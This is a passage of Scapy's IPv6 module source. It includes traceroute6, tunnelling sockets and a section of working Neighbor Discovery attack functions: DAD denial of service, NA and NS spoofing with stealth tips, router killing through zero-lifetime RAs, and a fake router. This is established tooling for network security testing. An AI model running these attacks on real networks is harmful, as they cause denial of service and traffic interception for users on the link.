3407############################################################################# 

3408############################################################################# 

3409 

3410class AS_resolver6(AS_resolver_riswhois): 

3411 def _resolve_one(self, ip): 

3412 """ 

3413 overloaded version to provide a Whois resolution on the 

3414 embedded IPv4 address if the address is 6to4 or Teredo. 

3415 Otherwise, the native IPv6 address is passed. 

3416 """ 

3417 

3418 if in6_isaddr6to4(ip): # for 6to4, use embedded @ 

3419 tmp = inet_pton(socket.AF_INET6, ip) 

3420 addr = inet_ntop(socket.AF_INET, tmp[2:6]) 

3421 elif in6_isaddrTeredo(ip): # for Teredo, use mapped address 

3422 addr = teredoAddrExtractInfo(ip)[2] 

3423 else: 

3424 addr = ip 

3425 

3426 _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) 

3427 

3428 if asn.startswith("AS"): 

3429 try: 

3430 asn = int(asn[2:]) 

3431 except ValueError: 

3432 pass 

3433 

3434 return ip, asn, desc 

3435 

3436 

3437class TracerouteResult6(TracerouteResult): 

3438 __slots__ = [] 

3439 

3440 def show(self): 

3441 return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501 

3442 s.hlim, 

3443 r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501 

3444 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501 

3445 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501 

3446 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501 

3447 

3448 def get_trace(self): 

3449 trace = {} 

3450 

3451 for s, r in self.res: 

3452 if IPv6 not in s: 

3453 continue 

3454 d = s[IPv6].dst 

3455 if d not in trace: 

3456 trace[d] = {} 

3457 

3458 t = not (ICMPv6TimeExceeded in r or 

3459 ICMPv6DestUnreach in r or 

3460 ICMPv6PacketTooBig in r or 

3461 ICMPv6ParamProblem in r) 

3462 

3463 trace[d][s[IPv6].hlim] = r[IPv6].src, t 

3464 

3465 for k in trace.values(): 

3466 try: 

3467 m = min(x for x, y in k.items() if y[1]) 

3468 except ValueError: 

3469 continue 

3470 for li in list(k): # use list(): k is modified in the loop 

3471 if li > m: 

3472 del k[li] 

3473 

3474 return trace 

3475 

3476 def graph(self, ASres=AS_resolver6(), **kargs): 

3477 TracerouteResult.graph(self, ASres=ASres, **kargs) 

3478 

3479 

3480@conf.commands.register 

3481def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), 

3482 l4=None, timeout=2, verbose=None, **kargs): 

3483 """Instant TCP traceroute using IPv6 

3484 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None 

3485 """ 

3486 if verbose is None: 

3487 verbose = conf.verb 

3488 

3489 if l4 is None: 

3490 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501 

3491 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501 

3492 else: 

3493 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4, 

3494 timeout=timeout, verbose=verbose, **kargs) 

3495 

3496 a = TracerouteResult6(a.res) 

3497 

3498 if verbose: 

3499 a.show() 

3500 

3501 return a, b 

3502 

3503############################################################################# 

3504############################################################################# 

3505# Sockets # 

3506############################################################################# 

3507############################################################################# 

3508 

3509 

3510if not WINDOWS: 

3511 from scapy.supersocket import L3RawSocket 

3512 

3513 class L3RawSocket6(L3RawSocket): 

3514 def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 

3515 # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 

3516 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 

3517 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 

3518 self.iface = iface 

3519 

3520 

3521def IPv6inIP(dst='203.178.135.36', src=None): 

3522 _IPv6inIP.dst = dst 

3523 _IPv6inIP.src = src 

3524 if not conf.L3socket == _IPv6inIP: 

3525 _IPv6inIP.cls = conf.L3socket 

3526 else: 

3527 del conf.L3socket 

3528 return _IPv6inIP 

3529 

3530 

3531class _IPv6inIP(SuperSocket): 

3532 dst = '127.0.0.1' 

3533 src = None 

3534 cls = None 

3535 

3536 def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501 

3537 SuperSocket.__init__(self, family, type, proto) 

3538 self.worker = self.cls(**args) 

3539 

3540 def set(self, dst, src=None): 

3541 _IPv6inIP.src = src 

3542 _IPv6inIP.dst = dst 

3543 

3544 def nonblock_recv(self): 

3545 p = self.worker.nonblock_recv() 

3546 return self._recv(p) 

3547 

3548 def recv(self, x): 

3549 p = self.worker.recv(x) 

3550 return self._recv(p, x) 

3551 

3552 def _recv(self, p, x=MTU): 

3553 if p is None: 

3554 return p 

3555 elif isinstance(p, IP): 

3556 # TODO: verify checksum 

3557 if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: 

3558 if isinstance(p.payload, IPv6): 

3559 return p.payload 

3560 return p 

3561 

3562 def send(self, x): 

3563 return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501 

3564 

3565 

3566############################################################################# 

3567############################################################################# 

3568# Neighbor Discovery Protocol Attacks # 

3569############################################################################# 

3570############################################################################# 

3571 

3572def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, 

3573 tgt_filter=None, reply_mac=None): 

3574 """ 

3575 Internal generic helper accepting a specific callback as first argument, 

3576 for NS or NA reply. See the two specific functions below. 

3577 """ 

3578 

3579 def is_request(req, mac_src_filter, tgt_filter): 

3580 """ 

3581 Check if packet req is a request 

3582 """ 

3583 

3584 # Those simple checks are based on Section 5.4.2 of RFC 4862 

3585 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 

3586 return 0 

3587 

3588 # Get and compare the MAC address 

3589 mac_src = req[Ether].src 

3590 if mac_src_filter and mac_src != mac_src_filter: 

3591 return 0 

3592 

3593 # Source must be the unspecified address 

3594 if req[IPv6].src != "::": 

3595 return 0 

3596 

3597 # Check destination is the link-local solicited-node multicast 

3598 # address associated with target address in received NS 

3599 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 

3600 if tgt_filter and tgt != tgt_filter: 

3601 return 0 

3602 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst) 

3603 expected_snma = in6_getnsma(tgt) 

3604 if received_snma != expected_snma: 

3605 return 0 

3606 

3607 return 1 

3608 

3609 if not iface: 

3610 iface = conf.iface 

3611 

3612 # To prevent sniffing our own traffic 

3613 if not reply_mac: 

3614 reply_mac = get_if_hwaddr(iface) 

3615 sniff_filter = "icmp6 and not ether src %s" % reply_mac 

3616 

3617 sniff(store=0, 

3618 filter=sniff_filter, 

3619 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 

3620 prn=lambda x: reply_callback(x, reply_mac, iface), 

3621 iface=iface) 

3622 

3623 

3624def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, 

3625 reply_mac=None): 

3626 """ 

3627 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 

3628 3756. This is done by listening incoming NS messages sent from the 

3629 unspecified address and sending a NS reply for the target address, 

3630 leading the peer to believe that another node is also performing DAD 

3631 for that address. 

3632 

3633 By default, the fake NS sent to create the DoS uses: 

3634 - as target address the target address found in received NS. 

3635 - as IPv6 source address: the unspecified address (::). 

3636 - as IPv6 destination address: the link-local solicited-node multicast 

3637 address derived from the target address in received NS. 

3638 - the mac address of the interface as source (or reply_mac, see below). 

3639 - the multicast mac address derived from the solicited node multicast 

3640 address used as IPv6 destination address. 

3641 

3642 Following arguments can be used to change the behavior: 

3643 

3644 iface: a specific interface (e.g. "eth0") of the system on which the 

3645 DoS should be launched. If None is provided conf.iface is used. 

3646 

3647 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

3648 Only NS messages received from this source will trigger replies. 

3649 This allows limiting the effects of the DoS to a single target by 

3650 filtering on its mac address. The default value is None: the DoS 

3651 is not limited to a specific mac address. 

3652 

3653 tgt_filter: Same as previous but for a specific target IPv6 address for 

3654 received NS. If the target address in the NS message (not the IPv6 

3655 destination address) matches that address, then a fake reply will 

3656 be sent, i.e. the emitter will be a target of the DoS. 

3657 

3658 reply_mac: allow specifying a specific source mac address for the reply, 

3659 i.e. to prevent the use of the mac address of the interface. 

3660 """ 

3661 

3662 def ns_reply_callback(req, reply_mac, iface): 

3663 """ 

3664 Callback that reply to a NS by sending a similar NS 

3665 """ 

3666 

3667 # Let's build a reply and send it 

3668 mac = req[Ether].src 

3669 dst = req[IPv6].dst 

3670 tgt = req[ICMPv6ND_NS].tgt 

3671 rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501 

3672 sendp(rep, iface=iface, verbose=0) 

3673 

3674 print("Reply NS for target address %s (received from %s)" % (tgt, mac)) 

3675 

3676 _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, 

3677 tgt_filter, reply_mac) 

3678 

3679 

3680def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, 

3681 reply_mac=None): 

3682 """ 

3683 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 

3684 3756. This is done by listening incoming NS messages *sent from the 

3685 unspecified address* and sending a NA reply for the target address, 

3686 leading the peer to believe that another node is also performing DAD 

3687 for that address. 

3688 

3689 By default, the fake NA sent to create the DoS uses: 

3690 - as target address the target address found in received NS. 

3691 - as IPv6 source address: the target address found in received NS. 

3692 - as IPv6 destination address: the link-local solicited-node multicast 

3693 address derived from the target address in received NS. 

3694 - the mac address of the interface as source (or reply_mac, see below). 

3695 - the multicast mac address derived from the solicited node multicast 

3696 address used as IPv6 destination address. 

3697 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled 

3698 with the mac address used as source of the NA. 

3699 

3700 Following arguments can be used to change the behavior: 

3701 

3702 iface: a specific interface (e.g. "eth0") of the system on which the 

3703 DoS should be launched. If None is provided conf.iface is used. 

3704 

3705 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

3706 Only NS messages received from this source will trigger replies. 

3707 This allows limiting the effects of the DoS to a single target by 

3708 filtering on its mac address. The default value is None: the DoS 

3709 is not limited to a specific mac address. 

3710 

3711 tgt_filter: Same as previous but for a specific target IPv6 address for 

3712 received NS. If the target address in the NS message (not the IPv6 

3713 destination address) matches that address, then a fake reply will 

3714 be sent, i.e. the emitter will be a target of the DoS. 

3715 

3716 reply_mac: allow specifying a specific source mac address for the reply, 

3717 i.e. to prevent the use of the mac address of the interface. This 

3718 address will also be used in the Target Link-Layer Address option. 

3719 """ 

3720 

3721 def na_reply_callback(req, reply_mac, iface): 

3722 """ 

3723 Callback that reply to a NS with a NA 

3724 """ 

3725 

3726 # Let's build a reply and send it 

3727 mac = req[Ether].src 

3728 dst = req[IPv6].dst 

3729 tgt = req[ICMPv6ND_NS].tgt 

3730 rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst) 

3731 rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741 

3732 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 

3733 sendp(rep, iface=iface, verbose=0) 

3734 

3735 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 

3736 

3737 _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, 

3738 tgt_filter, reply_mac) 

3739 

3740 

3741def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, 

3742 reply_mac=None, router=False): 

3743 """ 

3744 The main purpose of this function is to send fake Neighbor Advertisement 

3745 messages to a victim. As the emission of unsolicited Neighbor Advertisement 

3746 is pretty pointless (from an attacker standpoint) because it will not 

3747 lead to a modification of a victim's neighbor cache, the function send 

3748 advertisements in response to received NS (NS sent as part of the DAD, 

3749 i.e. with an unspecified address as source, are not considered). 

3750 

3751 By default, the fake NA sent to create the DoS uses: 

3752 - as target address the target address found in received NS. 

3753 - as IPv6 source address: the target address 

3754 - as IPv6 destination address: the source IPv6 address of received NS 

3755 message. 

3756 - the mac address of the interface as source (or reply_mac, see below). 

3757 - the source mac address of the received NS as destination macs address 

3758 of the emitted NA. 

3759 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) 

3760 filled with the mac address used as source of the NA. 

3761 

3762 Following arguments can be used to change the behavior: 

3763 

3764 iface: a specific interface (e.g. "eth0") of the system on which the 

3765 DoS should be launched. If None is provided conf.iface is used. 

3766 

3767 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

3768 Only NS messages received from this source will trigger replies. 

3769 This allows limiting the effects of the DoS to a single target by 

3770 filtering on its mac address. The default value is None: the DoS 

3771 is not limited to a specific mac address. 

3772 

3773 tgt_filter: Same as previous but for a specific target IPv6 address for 

3774 received NS. If the target address in the NS message (not the IPv6 

3775 destination address) matches that address, then a fake reply will 

3776 be sent, i.e. the emitter will be a target of the DoS. 

3777 

3778 reply_mac: allow specifying a specific source mac address for the reply, 

3779 i.e. to prevent the use of the mac address of the interface. This 

3780 address will also be used in the Target Link-Layer Address option. 

3781 

3782 router: by the default (False) the 'R' flag in the NA used for the reply 

3783 is not set. If the parameter is set to True, the 'R' flag in the 

3784 NA is set, advertising us as a router. 

3785 

3786 Please, keep the following in mind when using the function: for obvious 

3787 reasons (kernel space vs. Python speed), when the target of the address 

3788 resolution is on the link, the sender of the NS receives 2 NA messages 

3789 in a row, the valid one and our fake one. The second one will overwrite 

3790 the information provided by the first one, i.e. the natural latency of 

3791 Scapy helps here. 

3792 

3793 In practice, on a common Ethernet link, the emission of the NA from the 

3794 genuine target (kernel stack) usually occurs in the same millisecond as 

3795 the receipt of the NS. The NA generated by Scapy6 will usually come after 

3796 something 20+ ms. On a usual testbed for instance, this difference is 

3797 sufficient to have the first data packet sent from the victim to the 

3798 destination before it even receives our fake NA. 

3799 """ 

3800 

3801 def is_request(req, mac_src_filter, tgt_filter): 

3802 """ 

3803 Check if packet req is a request 

3804 """ 

3805 

3806 # Those simple checks are based on Section 5.4.2 of RFC 4862 

3807 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 

3808 return 0 

3809 

3810 mac_src = req[Ether].src 

3811 if mac_src_filter and mac_src != mac_src_filter: 

3812 return 0 

3813 

3814 # Source must NOT be the unspecified address 

3815 if req[IPv6].src == "::": 

3816 return 0 

3817 

3818 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 

3819 if tgt_filter and tgt != tgt_filter: 

3820 return 0 

3821 

3822 dst = req[IPv6].dst 

3823 if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. 

3824 

3825 # If this is a real address resolution NS, then the destination 

3826 # address of the packet is the link-local solicited node multicast 

3827 # address associated with the target of the NS. 

3828 # Otherwise, the NS is a NUD related one, i.e. the peer is 

3829 # unicasting the NS to check the target is still alive (L2 

3830 # information is still in its cache and it is verified) 

3831 received_snma = inet_pton(socket.AF_INET6, dst) 

3832 expected_snma = in6_getnsma(tgt) 

3833 if received_snma != expected_snma: 

3834 print("solicited node multicast @ does not match target @!") 

3835 return 0 

3836 

3837 return 1 

3838 

3839 def reply_callback(req, reply_mac, router, iface): 

3840 """ 

3841 Callback that reply to a NS with a spoofed NA 

3842 """ 

3843 

3844 # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and 

3845 # send it back. 

3846 mac = req[Ether].src 

3847 pkt = req[IPv6] 

3848 src = pkt.src 

3849 tgt = req[ICMPv6ND_NS].tgt 

3850 rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src) 

3851 # Use the target field from the NS 

3852 rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741 

3853 

3854 # "If the solicitation IP Destination Address is not a multicast 

3855 # address, the Target Link-Layer Address option MAY be omitted" 

3856 # Given our purpose, we always include it. 

3857 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 

3858 

3859 sendp(rep, iface=iface, verbose=0) 

3860 

3861 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 

3862 

3863 if not iface: 

3864 iface = conf.iface 

3865 # To prevent sniffing our own traffic 

3866 if not reply_mac: 

3867 reply_mac = get_if_hwaddr(iface) 

3868 sniff_filter = "icmp6 and not ether src %s" % reply_mac 

3869 

3870 router = 1 if router else 0 # Value of the R flags in NA 

3871 

3872 sniff(store=0, 

3873 filter=sniff_filter, 

3874 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 

3875 prn=lambda x: reply_callback(x, reply_mac, router, iface), 

3876 iface=iface) 

3877 

3878 

3879def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", 

3880 dst=None, src_mac=None, dst_mac=None, loop=True, 

3881 inter=1, iface=None): 

3882 """ 

3883 The main purpose of this function is to send fake Neighbor Solicitations 

3884 messages to a victim, in order to either create a new entry in its neighbor 

3885 cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated 

3886 that a node SHOULD create the entry or update an existing one (if it is not 

3887 currently performing DAD for the target of the NS). The entry's reachability # noqa: E501 

3888 state is set to STALE. 

3889 

3890 The two main parameters of the function are the source link-layer address 

3891 (carried by the Source Link-Layer Address option in the NS) and the 

3892 source address of the packet. 

3893 

3894 Unlike some other NDP_Attack_* function, this one is not based on a 

3895 stimulus/response model. When called, it sends the same NS packet in loop 

3896 every second (the default) 

3897 

3898 Following arguments can be used to change the format of the packets: 

3899 

3900 src_lladdr: the MAC address used in the Source Link-Layer Address option 

3901 included in the NS packet. This is the address that the peer should 

3902 associate in its neighbor cache with the IPv6 source address of the 

3903 packet. If None is provided, the mac address of the interface is 

3904 used. 

3905 

3906 src: the IPv6 address used as source of the packet. If None is provided, 

3907 an address associated with the emitting interface will be used 

3908 (based on the destination address of the packet). 

3909 

3910 target: the target address of the NS packet. If no value is provided, 

3911 a dummy address (2001:db8::1) is used. The value of the target 

3912 has a direct impact on the destination address of the packet if it 

3913 is not overridden. By default, the solicited-node multicast address 

3914 associated with the target is used as destination address of the 

3915 packet. Consider specifying a specific destination address if you 

3916 intend to use a target address different than the one of the victim. 

3917 

3918 dst: The destination address of the NS. By default, the solicited node 

3919 multicast address associated with the target address (see previous 

3920 parameter) is used if no specific value is provided. The victim 

3921 is not expected to check the destination address of the packet, 

3922 so using a multicast address like ff02::1 should work if you want 

3923 the attack to target all hosts on the link. On the contrary, if 

3924 you want to be more stealth, you should provide the target address 

3925 for this parameter in order for the packet to be sent only to the 

3926 victim. 

3927 

3928 src_mac: the MAC address used as source of the packet. By default, this 

3929 is the address of the interface. If you want to be more stealth, 

3930 feel free to use something else. Note that this address is not the 

3931 that the victim will use to populate its neighbor cache. 

3932 

3933 dst_mac: The MAC address used as destination address of the packet. If 

3934 the IPv6 destination address is multicast (all-nodes, solicited 

3935 node, ...), it will be computed. If the destination address is 

3936 unicast, a neighbor solicitation will be performed to get the 

3937 associated address. If you want the attack to be stealth, you 

3938 can provide the MAC address using this parameter. 

3939 

3940 loop: By default, this parameter is True, indicating that NS packets 

3941 will be sent in loop, separated by 'inter' seconds (see below). 

3942 When set to False, a single packet is sent. 

3943 

3944 inter: When loop parameter is True (the default), this parameter provides 

3945 the interval in seconds used for sending NS packets. 

3946 

3947 iface: to force the sending interface. 

3948 """ 

3949 

3950 if not iface: 

3951 iface = conf.iface 

3952 

3953 # Use provided MAC address as source link-layer address option 

3954 # or the MAC address of the interface if none is provided. 

3955 if not src_lladdr: 

3956 src_lladdr = get_if_hwaddr(iface) 

3957 

3958 # Prepare packets parameters 

3959 ether_params = {} 

3960 if src_mac: 

3961 ether_params["src"] = src_mac 

3962 

3963 if dst_mac: 

3964 ether_params["dst"] = dst_mac 

3965 

3966 ipv6_params = {} 

3967 if src: 

3968 ipv6_params["src"] = src 

3969 if dst: 

3970 ipv6_params["dst"] = dst 

3971 else: 

3972 # Compute the solicited-node multicast address 

3973 # associated with the target address. 

3974 tmp = inet_ntop(socket.AF_INET6, 

3975 in6_getnsma(inet_pton(socket.AF_INET6, target))) 

3976 ipv6_params["dst"] = tmp 

3977 

3978 pkt = Ether(**ether_params) 

3979 pkt /= IPv6(**ipv6_params) 

3980 pkt /= ICMPv6ND_NS(tgt=target) 

3981 pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr) 

3982 

3983 sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0) 

3984 

3985 

3986def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None, 

3987 ip_src_filter=None, reply_mac=None, 

3988 tgt_mac=None): 

3989 """ 

3990 The purpose of the function is to monitor incoming RA messages 

3991 sent by default routers (RA with a non-zero Router Lifetime values) 

3992 and invalidate them by immediately replying with fake RA messages 

3993 advertising a zero Router Lifetime value. 

3994 

3995 The result on receivers is that the router is immediately invalidated, 

3996 i.e. the associated entry is discarded from the default router list 

3997 and destination cache is updated to reflect the change. 

3998 

3999 By default, the function considers all RA messages with a non-zero 

4000 Router Lifetime value but provides configuration knobs to allow 

4001 filtering RA sent by specific routers (Ethernet source address). 

4002 With regard to emission, the multicast all-nodes address is used 

4003 by default but a specific target can be used, in order for the DoS to 

4004 apply only to a specific host. 

4005 

4006 More precisely, following arguments can be used to change the behavior: 

4007 

4008 iface: a specific interface (e.g. "eth0") of the system on which the 

4009 DoS should be launched. If None is provided conf.iface is used. 

4010 

4011 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

4012 Only RA messages received from this source will trigger replies. 

4013 If other default routers advertised their presence on the link, 

4014 their clients will not be impacted by the attack. The default 

4015 value is None: the DoS is not limited to a specific mac address. 

4016 

4017 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 

4018 on. Only RA messages received from this source address will trigger 

4019 replies. If other default routers advertised their presence on the 

4020 link, their clients will not be impacted by the attack. The default 

4021 value is None: the DoS is not limited to a specific IPv6 source 

4022 address. 

4023 

4024 reply_mac: allow specifying a specific source mac address for the reply, 

4025 i.e. to prevent the use of the mac address of the interface. 

4026 

4027 tgt_mac: allow limiting the effect of the DoS to a specific host, 

4028 by sending the "invalidating RA" only to its mac address. 

4029 """ 

4030 

4031 def is_request(req, mac_src_filter, ip_src_filter): 

4032 """ 

4033 Check if packet req is a request 

4034 """ 

4035 

4036 if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req): 

4037 return 0 

4038 

4039 mac_src = req[Ether].src 

4040 if mac_src_filter and mac_src != mac_src_filter: 

4041 return 0 

4042 

4043 ip_src = req[IPv6].src 

4044 if ip_src_filter and ip_src != ip_src_filter: 

4045 return 0 

4046 

4047 # Check if this is an advertisement for a Default Router 

4048 # by looking at Router Lifetime value 

4049 if req[ICMPv6ND_RA].routerlifetime == 0: 

4050 return 0 

4051 

4052 return 1 

4053 

4054 def ra_reply_callback(req, reply_mac, tgt_mac, iface): 

4055 """ 

4056 Callback that sends an RA with a 0 lifetime 

4057 """ 

4058 

4059 # Let's build a reply and send it 

4060 

4061 src = req[IPv6].src 

4062 

4063 # Prepare packets parameters 

4064 ether_params = {} 

4065 if reply_mac: 

4066 ether_params["src"] = reply_mac 

4067 

4068 if tgt_mac: 

4069 ether_params["dst"] = tgt_mac 

4070 

4071 # Basis of fake RA (high pref, zero lifetime) 

4072 rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1") 

4073 rep /= ICMPv6ND_RA(prf=1, routerlifetime=0) 

4074 

4075 # Add it a PIO from the request ... 

4076 tmp = req 

4077 while ICMPv6NDOptPrefixInfo in tmp: 

4078 pio = tmp[ICMPv6NDOptPrefixInfo] 

4079 tmp = pio.payload 

4080 del pio.payload 

4081 rep /= pio 

4082 

4083 # ... and source link layer address option 

4084 if ICMPv6NDOptSrcLLAddr in req: 

4085 mac = req[ICMPv6NDOptSrcLLAddr].lladdr 

4086 else: 

4087 mac = req[Ether].src 

4088 rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac) 

4089 

4090 sendp(rep, iface=iface, verbose=0) 

4091 

4092 print("Fake RA sent with source address %s" % src) 

4093 

4094 if not iface: 

4095 iface = conf.iface 

4096 # To prevent sniffing our own traffic 

4097 if not reply_mac: 

4098 reply_mac = get_if_hwaddr(iface) 

4099 sniff_filter = "icmp6 and not ether src %s" % reply_mac 

4100 

4101 sniff(store=0, 

4102 filter=sniff_filter, 

4103 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 

4104 prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface), 

4105 iface=iface) 

4106 

4107 

4108def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None, 

4109 ip_src_filter=None): 

4110 """ 

4111 The purpose of this function is to send provided RA message at layer 2 

4112 (i.e. providing a packet starting with IPv6 will not work) in response 

4113 to received RS messages. In the end, the function is a simple wrapper 

4114 around sendp() that monitor the link for RS messages. 

4115 

4116 It is probably better explained with an example: 

4117 

4118 >>> ra = Ether()/IPv6()/ICMPv6ND_RA() 

4119 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) 

4120 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) 

4121 >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") 

4122 >>> NDP_Attack_Fake_Router(ra, iface="eth0") 

4123 Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573 

4124 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae 

4125 ... 

4126 

4127 Following arguments can be used to change the behavior: 

4128 

4129 ra: the RA message to send in response to received RS message. 

4130 

4131 iface: a specific interface (e.g. "eth0") of the system on which the 

4132 DoS should be launched. If none is provided, conf.iface is 

4133 used. 

4134 

4135 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

4136 Only RS messages received from this source will trigger a reply. 

4137 Note that no changes to provided RA is done which imply that if 

4138 you intend to target only the source of the RS using this option, 

4139 you will have to set the Ethernet destination address to the same 

4140 value in your RA. 

4141 The default value for this parameter is None: no filtering on the 

4142 source of RS is done. 

4143 

4144 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 

4145 on. Only RS messages received from this source address will trigger 

4146 replies. Same comment as for previous argument apply: if you use 

4147 the option, you will probably want to set a specific Ethernet 

4148 destination address in the RA. 

4149 """ 

4150 

4151 def is_request(req, mac_src_filter, ip_src_filter): 

4152 """ 

4153 Check if packet req is a request 

4154 """ 

4155 

4156 if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req): 

4157 return 0 

4158 

4159 mac_src = req[Ether].src 

4160 if mac_src_filter and mac_src != mac_src_filter: 

4161 return 0 

4162 

4163 ip_src = req[IPv6].src 

4164 if ip_src_filter and ip_src != ip_src_filter: 

4165 return 0 

4166 

4167 return 1 

4168 

4169 def ra_reply_callback(req, iface): 

4170 """ 

4171 Callback that sends an RA in reply to an RS 

4172 """ 

4173 

4174 src = req[IPv6].src 

4175 sendp(ra, iface=iface, verbose=0) 

4176 print("Fake RA sent in response to RS from %s" % src) 

4177 

4178 if not iface: 

4179 iface = conf.iface 

4180 sniff_filter = "icmp6" 

4181 

4182 sniff(store=0, 

4183 filter=sniff_filter, 

4184 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 

4185 prn=lambda x: ra_reply_callback(x, iface), 

4186 iface=iface) 

4187 

4188############################################################################# 

4189# Pre-load classes ## 

4190############################################################################# 

4191 

4192 

4193def _get_cls(name): 

4194 return globals().get(name, Raw) 

4195 

4196 

4197def _load_dict(d): 

4198 for k, v in d.items(): 

4199 d[k] = _get_cls(v) 

4200 

4201 

4202_load_dict(icmp6ndoptscls) 

4203_load_dict(icmp6typescls) 

4204_load_dict(ipv6nhcls) 

4205 

4206############################################################################# 

4207############################################################################# 

4208# Layers binding # 

4209############################################################################# 

4210############################################################################# 

4211 

4212conf.l3types.register(ETH_P_IPV6, IPv6) 

4213conf.l3types.register_num2layer(ETH_P_ALL, IPv46) 

4214conf.l2types.register(31, IPv6) 

4215conf.l2types.register(DLT_IPV6, IPv6) 

4216conf.l2types.register(DLT_RAW, IPv46) 

4217conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46) 

4218 

4219bind_layers(Ether, IPv6, type=0x86dd) 

4220bind_layers(CookedLinux, IPv6, proto=0x86dd) 

4221bind_layers(GRE, IPv6, proto=0x86dd) 

4222bind_layers(SNAP, IPv6, code=0x86dd) 

4223# AF_INET6 values are platform-dependent. For a detailed explaination, read 

4224# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354 # noqa: E501 

4225if WINDOWS: 

4226 bind_layers(Loopback, IPv6, type=0x18) 

4227else: 

4228 bind_layers(Loopback, IPv6, type=socket.AF_INET6) 

4229bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP) 

4230bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP) 

4231bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP) 

4232bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP) 

4233bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6) 

4234bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6) 

